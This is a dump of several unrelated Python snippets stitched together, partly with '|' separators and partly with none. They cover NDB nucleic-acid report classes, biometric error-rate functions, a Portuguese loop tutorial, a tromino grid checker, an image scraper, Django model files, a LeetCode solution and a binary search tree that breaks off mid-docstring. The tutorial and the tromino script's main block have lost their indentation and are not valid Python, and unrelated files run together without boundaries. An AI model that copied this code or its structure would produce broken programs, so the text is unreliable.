        """Higher resolution limit."""
        return self._report['Higher Resolution Limit']

    @property
    def lower_resolution(self) -> float:
        """Lower resolution limit."""
        return self._report['Lower Resolution Limit']

    @property
    def reflections(self) -> int:
        """Number of reflections observed."""
        return self._report['Reflections Observed']

    @property
    def structure_ref(self) -> str:
        """Structure refinement method."""
        return self._report['Structure Refinement']

    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Not supported for this report type; does nothing."""
        pass
class NABackboneTorsionReport(_AdvancedBaseReport):
    """Class for nucleic-acid backbone torsion search report extending _AdvancedBaseReport"""
    def __init__(self, report: dict = None):
        """Default constructor

        :param report: report dict to make report (default value = None)
        :type report: dict"""
        super().__init__()
        self._update({
            'Model ID': '',
            'Chain ID': '',
            'Residue Num': 0,
            'Residue Name': '',
            # BUG FIX: this key was seeded as "O3'-P-O5'-C5" (missing the
            # trailing apostrophe), so the o3_p_o5_c5 property raised
            # KeyError on default-constructed reports.
            "O3'-P-O5'-C5'": 0,
            "P-O5'-C5'-C4'": 0,
            "O5'-C5'-C4'-C3'": 0,
            "C5'-C4'-C3'-O3'": 0,
            "C4'-C3'-O3'-P": 0,
            "C3'-O3'-P-O5'": 0,
            "O4'-C1'-N1-9-C2-4": 0
        })
        if report:
            self._update(_assign_numbers(report))

    @staticmethod
    def report_type() -> str:
        return 'nabt'

    @property
    def model_id(self) -> str:
        """Model ID of the structure."""
        return self._report['Model ID']

    @property
    def chain_id(self) -> str:
        """Chain ID within the model."""
        return self._report['Chain ID']

    @property
    def residue_number(self) -> int:
        """Residue number."""
        return self._report['Residue Num']

    @property
    def residue_name(self) -> str:
        """Residue name."""
        return self._report['Residue Name']

    @property
    def o3_p_o5_c5(self) -> float:
        """Torsion angle O3'-P-O5'-C5'."""
        return self._report["O3'-P-O5'-C5'"]

    @property
    def p_o5_c5_c4(self) -> float:
        """Torsion angle P-O5'-C5'-C4'."""
        return self._report["P-O5'-C5'-C4'"]

    @property
    def o5_c5_c4_c3(self) -> float:
        """Torsion angle O5'-C5'-C4'-C3'."""
        return self._report["O5'-C5'-C4'-C3'"]

    @property
    def c5_c4_c3_o3(self) -> float:
        """Torsion angle C5'-C4'-C3'-O3'."""
        return self._report["C5'-C4'-C3'-O3'"]

    @property
    def c4_c3_o3_p(self) -> float:
        """Torsion angle C4'-C3'-O3'-P."""
        return self._report["C4'-C3'-O3'-P"]

    @property
    def c3_o3_p_o5(self) -> float:
        """Torsion angle C3'-O3'-P-O5'."""
        return self._report["C3'-O3'-P-O5'"]

    @property
    def o4_c1_n1_9_c2_4(self) -> float:
        """Torsion angle O4'-C1'-N1-9-C2-4."""
        return self._report["O4'-C1'-N1-9-C2-4"]

    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Not supported for this report type; does nothing."""
        pass
class BasePairParameterReport(_AdvancedBaseReport):
    """Class for base pair parameter search report extending _AdvancedBaseReport.

    Keys mirror the NDB column names, including the 'Propellor' spelling
    (NDB's spelling of "propeller"), which must not be corrected."""
    def __init__(self, report: dict = None):
        """Default constructor

        :param report: report dict to make report (default value = None)
        :type report: dict"""
        super().__init__()
        self._update({
            'Model Number': 0,
            'Pair Number': 0,
            'Pair Name': '',
            'Shear': 0,
            'Stretch': 0,
            'Stagger': 0,
            'Buckle': 0,
            'Propellor': 0,
            'Opening': 0
        })
        if report:
            self._update(_assign_numbers(report))
    @staticmethod
    def report_type() -> str:
        """Short NDB code identifying this report type."""
        return 'bpp'
    @property
    def model_num(self) -> int:
        """Gets advanced report structure model number

        :return: model number
        :rtype: int
        """
        return self._report['Model Number']
    @property
    def pair_num(self) -> int:
        """Gets advanced report structure pair number

        :return: pair number
        :rtype: int
        """
        return self._report['Pair Number']
    @property
    def pair_name(self) -> str:
        """Gets advanced report structure pair name

        :return: pair name
        :rtype: str
        """
        return self._report['Pair Name']
    @property
    def shear(self) -> float:
        """Gets advanced report structure shear

        :return: shear
        :rtype: float
        """
        return self._report['Shear']
    @property
    def stretch(self) -> float:
        """Gets advanced report structure stretch

        :return: stretch
        :rtype: float
        """
        return self._report['Stretch']
    @property
    def stagger(self) -> float:
        """Gets advanced report structure stagger

        :return: stagger
        :rtype: float
        """
        return self._report['Stagger']
    @property
    def buckle(self) -> float:
        """Gets advanced report structure buckle

        :return: buckle
        :rtype: float
        """
        return self._report['Buckle']
    @property
    def propellor(self) -> float:
        """Gets advanced report structure propellor (NDB spelling of propeller)

        :return: propellor
        :rtype: float
        """
        return self._report['Propellor']
    @property
    def opening(self) -> float:
        """Gets advanced report structure opening

        :return: opening
        :rtype: float
        """
        return self._report['Opening']
    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """NOT WORKS ON THIS REPORT TYPE"""
        pass
class BasePairStepParameterReport(_AdvancedBaseReport):
    """Class for base pair step parameter search report extending _AdvancedBaseReport"""
    def __init__(self, report: dict = None):
        """Default constructor

        :param report: report dict to make report (default value = None)
        :type report: dict"""
        super().__init__()
        self._update({
            'Model Number': 0,
            'Step Number': 0,
            'Step Name': '',
            'Shift': 0,
            'Slide': 0,
            'Rise': 0,
            'Tilt': 0,
            'Roll': 0,
            'Twist': 0,
            'X-Displacement': 0,
            'Y-Displacement': 0,
            'Helical Rise': 0,
            'Inclination': 0,
            'Tip': 0,
            'Helical Twist': 0
        })
        if report:
            self._update(_assign_numbers(report))
    @staticmethod
    def report_type() -> str:
        """Short NDB code identifying this report type."""
        return 'bpsp'
    @property
    def model_num(self) -> int:
        """Gets advanced report structure model number

        :return: model number
        :rtype: int
        """
        return self._report['Model Number']
    @property
    def step_num(self) -> int:
        """Gets advanced report structure step number

        :return: step number
        :rtype: int
        """
        return self._report['Step Number']
    @property
    def step_name(self) -> str:
        """Gets advanced report structure step name

        :return: step name
        :rtype: str
        """
        return self._report['Step Name']
    @property
    def shift(self) -> float:
        """Gets advanced report structure shift

        :return: shift
        :rtype: float
        """
        return self._report['Shift']
    @property
    def slide(self) -> float:
        """Gets advanced report structure slide

        :return: slide
        :rtype: float
        """
        return self._report['Slide']
    @property
    def rise(self) -> float:
        """Gets advanced report structure rise

        :return: rise
        :rtype: float
        """
        return self._report['Rise']
    @property
    def tilt(self) -> float:
        """Gets advanced report structure tilt

        :return: tilt
        :rtype: float
        """
        return self._report['Tilt']
    @property
    def roll(self) -> float:
        """Gets advanced report structure roll

        :return: roll
        :rtype: float
        """
        return self._report['Roll']
    @property
    def x_disp(self) -> float:
        """Gets advanced report structure x displacement

        :return: x displacement
        :rtype: float
        """
        return self._report['X-Displacement']
    @property
    def y_disp(self) -> float:
        """Gets advanced report structure y displacement

        :return: y displacement
        :rtype: float
        """
        return self._report['Y-Displacement']
    @property
    def helical_rise(self) -> float:
        """Gets advanced report structure helical rise

        :return: helical rise
        :rtype: float
        """
        return self._report['Helical Rise']
    @property
    def inclination(self) -> float:
        """Gets advanced report structure inclination

        :return: inclination
        :rtype: float
        """
        return self._report['Inclination']
    @property
    def tip(self) -> float:
        """Gets advanced report structure tip

        :return: tip
        :rtype: float
        """
        return self._report['Tip']
    @property
    def helical_twist(self) -> float:
        """Gets advanced report structure helical twist

        :return: helical twist
        :rtype: float
        """
        return self._report['Helical Twist']
    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """NOT WORKS ON THIS REPORT TYPE"""
        pass
class DescriptorReport(_AdvancedBaseReport):
    """Advanced search report carrying only the structure description."""
    def __init__(self, report: dict = None):
        """Initialise default fields and optionally merge a report dict.

        :param report: report dict to make report (default value = None)
        :type report: dict"""
        super().__init__()
        defaults = {
            'Structure Description': '',
        }
        self._update(defaults)
        if report:
            self._update(report)
    @staticmethod
    def report_type() -> str:
        """Short NDB code identifying this report type."""
        return 'desc'
    @property
    def description(self) -> str:
        """Structure description text.

        :return: description
        :rtype: str
        """
        return self._report['Structure Description']
    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """NOT WORKS ON THIS REPORT TYPE"""
        pass
class SequencesReport(_AdvancedBaseReport):
    """Advanced search report pairing a nucleic-acid sequence with its
    structure description."""
    def __init__(self, report: dict = None):
        """Initialise default fields and optionally merge a report dict.

        :param report: report dict to make report (default value = None)
        :type report: dict"""
        super().__init__()
        defaults = {
            'NA Sequence': '',
            'Structure Description': '',
        }
        self._update(defaults)
        if report:
            self._update(report)
    @staticmethod
    def report_type() -> str:
        """Short NDB code identifying this report type."""
        return 'naSeq'
    @property
    def sequence(self) -> str:
        """Nucleic-acid sequence string.

        :return: sequence
        :rtype: str
        """
        return self._report['NA Sequence']
    @property
    def description(self) -> str:
        """Structure description text.

        :return: description
        :rtype: str
        """
        return self._report['Structure Description']
    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """NOT WORKS ON THIS REPORT TYPE"""
        pass
class StatisticReport(object):
    """Class for statistic search report"""
    def __init__(self, report: dict = None):
        """Default constructor

        :param report: report dict to make report (default value = None)
        :type report: dict"""
        self._stats = report
    @property
    def stats(self) -> dict:
        """Gets advanced report statistics

        :return: statistics mapping as supplied to the constructor (may be None)
        :rtype: dict
        """
        return self._stats
class RNA3DBasePairRelFreqReport(_AdvancedBaseReport):
    """Class for RNA 3D Base Pair Relative Frequency Report search report extending _AdvancedBaseReport"""
    def __init__(self, report: dict = None):
        """Default constructor

        :param report: report dict to make report (default value = None)
        :type report: dict"""
        super().__init__()
        self._update({
            'PDB ID': '',
            'Relative cWW': 0,
            'Relative tWW': 0,
            'Relative cWH': 0,
            'Relative tWH': 0,
            'Relative cWS': 0,
            'Relative tWS': 0,
            'Relative cHH': 0,
            'Relative tHH': 0,
            'Relative cHS': 0,
            'Relative tHS': 0,
            'Relative cSS': 0,
            'Relative tSS': 0
        })
        if report:
            self._update(_assign_numbers(report))
    @staticmethod
    def report_type() -> str:
        """Short NDB code identifying this report type."""
        return 'bpFreq'
    @property
    def pdb_id(self) -> str:
        """Gets advanced report structure PDB ID

        :return: PDB ID
        :rtype: str
        """
        return self._report['PDB ID']
    @property
    def cww(self) -> float:
        """Gets advanced report relative cWW

        :return: relative cWW
        :rtype: float
        """
        return self._report['Relative cWW']
    @property
    def tww(self) -> float:
        """Gets advanced report relative tWW

        :return: relative tWW
        :rtype: float
        """
        return self._report['Relative tWW']
    @property
    def cwh(self) -> float:
        """Gets advanced report relative cWH

        :return: relative cWH
        :rtype: float
        """
        return self._report['Relative cWH']
    @property
    def twh(self) -> float:
        """Gets advanced report relative tWH

        :return: relative tWH
        :rtype: float
        """
        return self._report['Relative tWH']
    @property
    def cws(self) -> float:
        """Gets advanced report relative cWS

        :return: relative cWS
        :rtype: float
        """
        return self._report['Relative cWS']
    @property
    def tws(self) -> float:
        """Gets advanced report relative tWS

        :return: relative tWS
        :rtype: float
        """
        return self._report['Relative tWS']
    @property
    def chh(self) -> float:
        """Gets advanced report relative cHH

        :return: relative cHH
        :rtype: float
        """
        return self._report['Relative cHH']
    @property
    def thh(self) -> float:
        """Gets advanced report relative tHH

        :return: relative tHH
        :rtype: float
        """
        return self._report['Relative tHH']
    @property
    def chs(self) -> float:
        """Gets advanced report relative cHS

        :return: relative cHS
        :rtype: float
        """
        return self._report['Relative cHS']
    @property
    def ths(self) -> float:
        """Gets advanced report relative tHS

        :return: relative tHS
        :rtype: float
        """
        return self._report['Relative tHS']
    @property
    def css(self) -> float:
        """Gets advanced report relative cSS

        :return: relative cSS
        :rtype: float
        """
        return self._report['Relative cSS']
    @property
    def tss(self) -> float:
        """Gets advanced report relative tSS

        :return: relative tSS
        :rtype: float
        """
        return self._report['Relative tSS']
    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Download PDB from NDB

        :param download_type: file download type (default value is DownloadType.Pdb)
        :type download_type: DownloadType
        :param target_dir: where to save file (default value is current dir)
        :type target_dir: str
        :param save: tells if file should be saved or not (default value = False)
        :type save: bool
        :return: string or None
        :rtype: str
        """
        # Prefer the PDB identifier; fall back to the NDB identifier.
        id_structure = self.pdb_id
        if not self.pdb_id:
            print("No pdb_id trying ndb_id")
            id_structure = self.ndb_id
        return DownloadHelper.download(id_structure, download_type, save, target_dir)
class RNA3DBasePhosphateRelFreqReport(_AdvancedBaseReport):
    """Class for RNA 3D Base Phosphate Relative Frequency Report search report extending _AdvancedBaseReport.

    Exposes the relative frequencies of the 0BPh-9BPh base-phosphate
    interaction categories (keys mirror the NDB column names)."""
    def __init__(self, report: dict = None):
        """Default constructor

        :param report: report dict to make report (default value = None)
        :type report: dict"""
        super().__init__()
        self._update({
            'PDB ID': '',
            'Relative 1BPh': 0,
            'Relative 2BPh': 0,
            'Relative 3BPh': 0,
            'Relative 4BPh': 0,
            'Relative 5BPh': 0,
            'Relative 6BPh': 0,
            'Relative 7BPh': 0,
            'Relative 8BPh': 0,
            'Relative 9BPh': 0,
            'Relative 0BPh': 0
        })
        if report:
            self._update(_assign_numbers(report))
    @staticmethod
    def report_type() -> str:
        """Short NDB code identifying this report type."""
        return 'bphsFreq'
    @property
    def pdb_id(self) -> str:
        """Gets advanced report structure PDB ID

        :return: PDB ID
        :rtype: str
        """
        return self._report['PDB ID']
    @property
    def bph_1(self) -> float:
        """Gets advanced report relative 1BPh

        :return: relative 1BPh
        :rtype: float
        """
        return self._report['Relative 1BPh']
    @property
    def bph_2(self) -> float:
        """Gets advanced report relative 2BPh

        :return: relative 2BPh
        :rtype: float
        """
        return self._report['Relative 2BPh']
    @property
    def bph_3(self) -> float:
        """Gets advanced report relative 3BPh

        :return: relative 3BPh
        :rtype: float
        """
        return self._report['Relative 3BPh']
    @property
    def bph_4(self) -> float:
        """Gets advanced report relative 4BPh

        :return: relative 4BPh
        :rtype: float
        """
        return self._report['Relative 4BPh']
    @property
    def bph_5(self) -> float:
        """Gets advanced report relative 5BPh

        :return: relative 5BPh
        :rtype: float
        """
        return self._report['Relative 5BPh']
    @property
    def bph_6(self) -> float:
        """Gets advanced report relative 6BPh

        :return: relative 6BPh
        :rtype: float
        """
        return self._report['Relative 6BPh']
    @property
    def bph_7(self) -> float:
        """Gets advanced report relative 7BPh

        :return: relative 7BPh
        :rtype: float
        """
        return self._report['Relative 7BPh']
    @property
    def bph_8(self) -> float:
        """Gets advanced report relative 8BPh

        :return: relative 8BPh
        :rtype: float
        """
        return self._report['Relative 8BPh']
    @property
    def bph_9(self) -> float:
        """Gets advanced report relative 9BPh

        :return: relative 9BPh
        :rtype: float
        """
        return self._report['Relative 9BPh']
    @property
    def bph_0(self) -> float:
        """Gets advanced report relative 0BPh

        :return: relative 0BPh
        :rtype: float
        """
        return self._report['Relative 0BPh']
    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Download PDB from NDB

        :param download_type: file download type (default value is DownloadType.Pdb)
        :type download_type: DownloadType
        :param target_dir: where to save file (default value is current dir)
        :type target_dir: str
        :param save: tells if file should be saved or not (default value = False)
        :type save: bool
        :return: string or None
        :rtype: str
        """
        # Prefer the PDB identifier; fall back to the NDB identifier.
        id_structure = self.pdb_id
        if not self.pdb_id:
            print("No pdb_id trying ndb_id")
            id_structure = self.ndb_id
        return DownloadHelper.download(id_structure, download_type, save, target_dir)
class RNA3DBaseStackingRelFreqReport(_AdvancedBaseReport):
    """Advanced search report exposing relative base-stacking frequencies
    (s33, s53, s55) for an RNA 3D structure."""
    def __init__(self, report: dict = None):
        """Initialise default fields and optionally merge a report dict.

        :param report: report dict to make report (default value = None)
        :type report: dict"""
        super().__init__()
        defaults = {
            'PDB ID': '',
            'Relative s33': 0,
            'Relative s53': 0,
            'Relative s55': 0
        }
        self._update(defaults)
        if report:
            self._update(_assign_numbers(report))
    @staticmethod
    def report_type() -> str:
        """Short NDB code identifying this report type."""
        return 'stackFreq'
    @property
    def pdb_id(self) -> str:
        """PDB identifier of the structure.

        :return: PDB ID
        :rtype: str
        """
        return self._report['PDB ID']
    @property
    def s33(self) -> float:
        """Relative s33 stacking frequency.

        :return: relative s33
        :rtype: float
        """
        return self._report['Relative s33']
    @property
    def s53(self) -> float:
        """Relative s53 stacking frequency.

        :return: relative s53
        :rtype: float
        """
        return self._report['Relative s53']
    @property
    def s55(self) -> float:
        """Relative s55 stacking frequency.

        :return: relative s55
        :rtype: float
        """
        return self._report['Relative s55']
    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Download the structure file from the NDB.

        :param download_type: file download type (default value is DownloadType.Pdb)
        :type download_type: DownloadType
        :param target_dir: where to save file (default value is current dir)
        :type target_dir: str
        :param save: tells if file should be saved or not (default value = False)
        :type save: bool
        :return: string or None
        :rtype: str
        """
        # Prefer the PDB identifier; fall back to the NDB identifier.
        if self.pdb_id:
            structure_id = self.pdb_id
        else:
            print("No pdb_id trying ndb_id")
            structure_id = self.ndb_id
        return DownloadHelper.download(structure_id, download_type, save, target_dir)
class RNA3DMotifReport(_AdvancedBaseReport):
    """Advanced search report for RNA 3D motifs (motif ID, common name,
    annotation) extending _AdvancedBaseReport."""
    def __init__(self, report: dict = None):
        """Initialise default fields and optionally merge a report dict.

        :param report: report dict to make report (default value = None)
        :type report: dict"""
        super().__init__()
        defaults = {
            'PDB ID': '',
            'Motif ID': '',
            'Common Name': '',
            'Annotation': ''
        }
        self._update(defaults)
        if report:
            self._update(report)
    @staticmethod
    def report_type() -> str:
        """Short NDB code identifying this report type."""
        return 'motif'
    @property
    def pdb_id(self) -> str:
        """PDB identifier of the structure.

        :return: PDB ID
        :rtype: str
        """
        return self._report['PDB ID']
    @property
    def motif_id(self) -> str:
        """Motif identifier.

        :return: motif ID
        :rtype: str
        """
        return self._report['Motif ID']
    @property
    def common_name(self) -> str:
        """Common name of the motif.

        :return: common name
        :rtype: str
        """
        return self._report['Common Name']
    @property
    def annotation(self) -> str:
        """Free-text annotation for the motif.

        :return: annotation
        :rtype: str
        """
        return self._report['Annotation']
    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Download the structure file from the NDB.

        :param download_type: file download type (default value is DownloadType.Pdb)
        :type download_type: DownloadType
        :param target_dir: where to save file (default value is current dir)
        :type target_dir: str
        :param save: tells if file should be saved or not (default value = False)
        :type save: bool
        :return: string or None
        :rtype: str
        """
        # Prefer the PDB identifier; fall back to the NDB identifier.
        if self.pdb_id:
            structure_id = self.pdb_id
        else:
            print("No pdb_id trying ndb_id")
            structure_id = self.ndb_id
        return DownloadHelper.download(structure_id, download_type, save, target_dir)
# NOTE(review): TypeVar is used here as a catch-all alias covering every
# advanced report class; typing.Union (or a common Protocol) would express
# that intent more directly, but the public name is kept unchanged.
AdvancedReport = TypeVar('AdvancedReport', NDBStatusReport, CellDimensionsReport, CitationReport, RefinementDataReport,
                         NABackboneTorsionReport, BasePairParameterReport, BasePairStepParameterReport,
                         DescriptorReport, SequencesReport, StatisticReport, RNA3DBasePairRelFreqReport,
                         RNA3DBasePhosphateRelFreqReport, RNA3DBaseStackingRelFreqReport, RNA3DMotifReport)
|
import numpy as np
def compute_frr_far(data, data_class_labels, threshold):
    """Compute false-rejection and false-acceptance rates, in percent.

    Each row of *data* holds one probe's scores against all samples;
    *data_class_labels* marks genuine/impostor membership.  The ``- 1`` in
    the genuine denominator discounts the self-match entry (presumably NaN
    on the diagonal, which never passes the threshold -- see get_scores).

    :return: tuple (FRR, FAR) as percentages
    """
    rejected_rates = []
    accepted_rates = []
    for idx, scores in enumerate(data):
        decisions = np.zeros_like(scores)
        decisions[scores > threshold] = 1
        genuine_mask = np.array(data_class_labels == data_class_labels[idx])
        genuine_decisions = decisions[genuine_mask == True]
        impostor_decisions = decisions[genuine_mask == False]
        rejected_rates.append(1 - (genuine_decisions.sum() / (len(genuine_decisions) - 1)))
        accepted_rates.append(impostor_decisions.sum() / len(impostor_decisions))
    cur_frr = np.array(rejected_rates).mean() * 100
    cur_far = np.array(accepted_rates).mean() * 100
    return cur_frr, cur_far
def compute_frr_at_far_points(list_frr, list_far):
    """Pick the FRR values at the FAR = 0.1, 1 and 10 (percent) points.

    The inputs come ordered by increasing threshold, i.e. decreasing FAR;
    scanning both in reverse makes FAR non-decreasing, and the first entry
    at or above each level is kept.  Levels never reached stay None.

    :return: tuple (FRR@FAR>=0.1, FRR@FAR>=1, FRR@FAR>=10)
    """
    frr_at_01 = frr_at_1 = frr_at_10 = None
    for frr_value, far_value in zip(reversed(list_frr), reversed(list_far)):
        if frr_at_01 is None and far_value >= 0.1:
            frr_at_01 = frr_value
        if frr_at_1 is None and far_value >= 1:
            frr_at_1 = frr_value
        if far_value >= 10 and frr_at_10 is None:
            frr_at_10 = frr_value
            break
    return frr_at_01, frr_at_1, frr_at_10
def find_eer(data, data_class_labels):
    """Sweep thresholds over [0, 1) and locate the equal-error-rate point.

    Evaluates compute_frr_far at 1000 evenly spaced thresholds and keeps
    the threshold minimising |FRR - FAR|.

    :return: (frr_list, far_list, eer_threshold_index, eer_threshold);
        the index points into the two lists.
    """
    frr_list = []
    far_list = []
    min_difference = np.inf
    eer_threshold = 0
    eer_threshold_index = 0
    count = 0
    for threshold in np.arange(0, 1, 0.001):
        cur_frr, cur_far = compute_frr_far(data, data_class_labels, threshold)
        frr_list.append(cur_frr)
        far_list.append(cur_far)
        # <= keeps updating on ties, so the highest qualifying threshold wins
        if np.abs(cur_frr - cur_far) <= min_difference:
            min_difference = np.abs(cur_frr - cur_far)
            eer_threshold = threshold
            eer_threshold_index = count
        count += 1
    return frr_list, far_list, eer_threshold_index, eer_threshold
def get_scores(data, data_class_labels):
    """Collect the genuine and impostor score populations from a score matrix.

    NaN entries (e.g. the self-match diagonal) are dropped from the genuine
    scores only, matching the original behaviour.

    :return: (genuine_scores, impostor_scores) as 1-D numpy arrays
    """
    genuine_all = None
    impostor_all = None
    for row_index, row in enumerate(data):
        same_class = np.array(data_class_labels == data_class_labels[row_index])
        genuine = row[same_class == True]
        genuine = genuine[~np.isnan(genuine)]
        impostor = row[same_class == False]
        if genuine_all is None:
            genuine_all = genuine
        else:
            genuine_all = np.append(genuine_all, genuine)
        if impostor_all is None:
            impostor_all = impostor
        else:
            impostor_all = np.append(impostor_all, impostor)
    return genuine_all, impostor_all
|
"""
Estrutura:
while {condição}:
comandos
# opcional para interrupção
if condicao
break
É possível usar usar "else", que será executado uma vez
"""
# Exemplo equivalente a 'for c in range(1,10), porém irá printar tb o 10 por causa do "else":'
c = 1
while c < 10:
print(c)
c += 1
else:
print(c)
print('Fim')
# Exemplo com limite desconhecido
r = 'S'
while r == 'S':
n = int(input('Digite um valor: '))
r = input('Deseja continuar (S/N)? ').strip().upper()
print('Fim')
|
from collections import defaultdict
def onlyOneZero(grid):
    """Return True when the whole grid contains exactly one 0 cell."""
    total_zeroes = sum(row.count(0) for row in grid)
    return total_zeroes == 1
def buildColorDict(n, grid):
    """Count how many cells carry each colour value.

    *n* is unused but kept for interface compatibility with the caller.
    Returns a defaultdict(int), so missing colours read as 0.
    """
    counts = defaultdict(int)
    for value in (cell for row in grid for cell in row):
        counts[value] += 1
    return counts
def buildShapeDict(n, grid):
    """Map each colour value to the list of its (x, y) coordinates.

    Coordinates are collected in row-major scan order; *n* is unused but
    kept for interface compatibility with the caller.
    """
    positions = defaultdict(list)
    coords = ((cell, (x, y)) for y, row in enumerate(grid) for x, cell in enumerate(row))
    for value, point in coords:
        positions[value].append(point)
    return positions
def isCorner(cells):
    """Check whether three cells form an L-tromino (a 2x2 square minus one).

    The cells are expected in row-major scan order, as produced by
    buildShapeDict.  The four accepted orientations, cells in scan order:

        OO    OO    .O    O.
        O.    .O    OO    OO
    """
    (x0, y0), (x1, y1), (x2, y2) = cells[0], cells[1], cells[2]
    # OO / O.
    if x1 == x0 + 1 and y1 == y0 and x2 == x0 and y2 == y0 + 1:
        return True
    # OO / .O
    if x1 == x0 + 1 and y1 == y0 and x2 == x1 and y2 == y1 + 1:
        return True
    # .O / OO
    if x2 == x1 + 1 and y2 == y1 and x2 == x0 and y2 == y0 + 1:
        return True
    # O. / OO
    if x1 == x0 and y1 == y0 + 1 and x2 == x1 + 1 and y2 == y1:
        return True
    return False
if __name__ == "__main__":
n = int(input())
grid = []
for i in range(2**n):
grid.append(list(map(int, input().split())))
M = buildColorDict(n, grid)
oneZero = M[0] == 1
allThree = True
for i in range(1, ((4**n) - 1) // 3 + 1):
if M[i] != 3:
allThree = False
break
if oneZero and allThree:
Mshape = buildShapeDict(n, grid)
allCorner = True
for i in range(1, ((4**n) - 1) // 3 + 1):
if not isCorner(Mshape[i]):
allCorner = False
break
if allCorner:
print(1)
else:
print(0)
else:
print(0)
|
import os
from urllib.parse import urlparse
from bs4 import BeautifulSoup
import requests
r=requests.get('http://www.xiachufang.com/')
# NOTE(review): no parser argument is passed to BeautifulSoup, so it picks
# whatever is available and emits a warning; behaviour kept as-is.
soup=BeautifulSoup(r.text)
#print(soup)
#print(soup.select('img'))
# Collect every image URL, preferring the lazy-load 'data-src' attribute.
img_list=[]
for img in soup.select('img'):
    if img.has_attr('data-src'):
        img_list.append(img.attrs['data-src'])
    else:
        img_list.append(img.attrs['src'])
# the last two entries are Sina (Weibo) icons -- drop them
img_list=img_list[0:-2]
#print(img_list)
# initialise the download directory (./images)
img_dir=os.path.join(os.curdir,'images')
if not os.path.isdir(img_dir):
    os.mkdir(img_dir)
for img in img_list:
    # Strip the size suffix after '@' and rebuild a clean download URL.
    o=urlparse(img)
    filename=o.path[1:].split('@')[0]
    filepath=os.path.join(img_dir,filename)
    url='%s://%s/%s'%(o.scheme,o.netloc,filename)
    print(url)
    res=requests.get(url)
    # Stream the image to disk in 1 KiB chunks.
    with open(filepath,'wb') as f:
        for chunk in res.iter_content(1024):
            f.write(chunk)
# One-line shell alternative (Linux) to scrape the photos:
#curl -s http://www.xiachufang.com/|grep -oP '(?<=src=\")http://i2\.chuimg\.com/\.jpg'|xargs -i curl --create-dir {} -o ./image/{}
# Generated by Django 2.1.4 on 2019-01-04 20:01
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: creates the Psychologues profile model, linked
    one-to-one with the (swappable) auth user model."""
    initial = True
    dependencies = [
        ('speciality', '0010_auto_20190104_2001'),
        ('services', '0001_initial'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Psychologues',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('avatar', models.ImageField(upload_to='static/media/')),
                ('phone', models.CharField(blank=True, max_length=10)),
                ('fax', models.CharField(blank=True, max_length=10)),
                ('bio', models.TextField(blank=True, max_length=700)),
                ('education', models.CharField(blank=True, max_length=70)),
                ('services', models.ManyToManyField(blank=True, to='services.Service')),
                ('specialities', models.ManyToManyField(blank=True, to='speciality.SpecialityDetail')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
from django.contrib import admin
from .models import Victim
# Register your models here.
# Expose Victim in the Django admin with the default ModelAdmin options.
admin.site.register(Victim)
class Solution:
    """LeetCode 7: reverse the decimal digits of a 32-bit signed integer."""

    def reverse(self, x: int) -> int:
        """Return x with its decimal digits reversed, preserving the sign.

        Returns 0 when the reversed value falls outside the signed 32-bit
        range [-2**31, 2**31 - 1].  (The original expression used
        ``x < 2**31`` on the magnitude, which wrongly rejected -2**31 --
        a representable value -- for negative results.)

        :param x: integer to reverse
        :return: reversed integer, or 0 on 32-bit overflow
        """
        sign = -1 if x < 0 else 1
        magnitude = int(str(abs(x))[::-1])
        result = sign * magnitude
        if -2**31 <= result <= 2**31 - 1:
            return result
        return 0
# Smoke-test the solution on the LeetCode sample inputs.
examples = [123, -123, 120, 0]
for example in examples:
    print(Solution().reverse(example))
# Reads two integers a and b and prints (b-a)(b-a-1)/2 - a.
# NOTE(review): the formula is taken as-is; the underlying problem statement
# is not visible here, so its meaning is unverified.
a, b = map(int, input().split())
print(int((b-a)*(b-a-1)/2 - a))
|
class Node:
    """A binary-tree node holding a payload and two child links."""

    def __init__(self, data):
        """Create a leaf node storing *data* with both children unset."""
        self.data = data
        self.left = None
        self.right = None
class BST:
    """Binary search tree: insert, two search variants, and a BST-specific
    lowest-common-ancestor walk.  Duplicates are inserted to the right."""
    def __init__(self):
        # Root node; None while the tree is empty.
        self.root = None
    def set_root(self,data):
        """Make a fresh node holding *data* the root of the tree."""
        self.root = Node(data)
    def insert_node(self,data):
        """Insert *data*, walking down until a free child slot is found.

        Values smaller than the current node go left; everything else
        (including equal values) goes right.
        """
        if self.root is None:
            self.set_root(data)
        else:
            n = Node(data)
            troot = self.root
            while troot:
                if data < troot.data:
                    if troot.left:
                        troot = troot.left
                    else:
                        troot.left = n
                        break
                else:
                    if troot.right:
                        troot = troot.right
                    else:
                        troot.right = n
                        break
    def search_node(self,data):
        """Return "Found" if *data* is in the tree, else "Not found".

        Iterative walk; after each step down, an early equality check is
        made on the child before looping (redundant with the final else
        branch, but harmless).
        """
        if self.root is None:
            return "Not found"
        else:
            troot = self.root
            while troot:
                if data < troot.data:
                    if troot.left:
                        troot = troot.left
                        # early check on the child; otherwise keep walking
                        if troot.data == data:
                            return "Found"
                    else:
                        return "Not found"
                elif data > troot.data:
                    if troot.right:
                        troot = troot.right
                        if troot.data == data:
                            return "Found"
                    else:
                        return "Not found"
                else:
                    return "Found"
    def lowestCommonAncestor(self, root: 'Node', p: 'Node', q: 'Node') -> 'Node':
        """Return the lowest common ancestor of nodes *p* and *q*.

        Uses the BST ordering: while p and q lie on the same side of
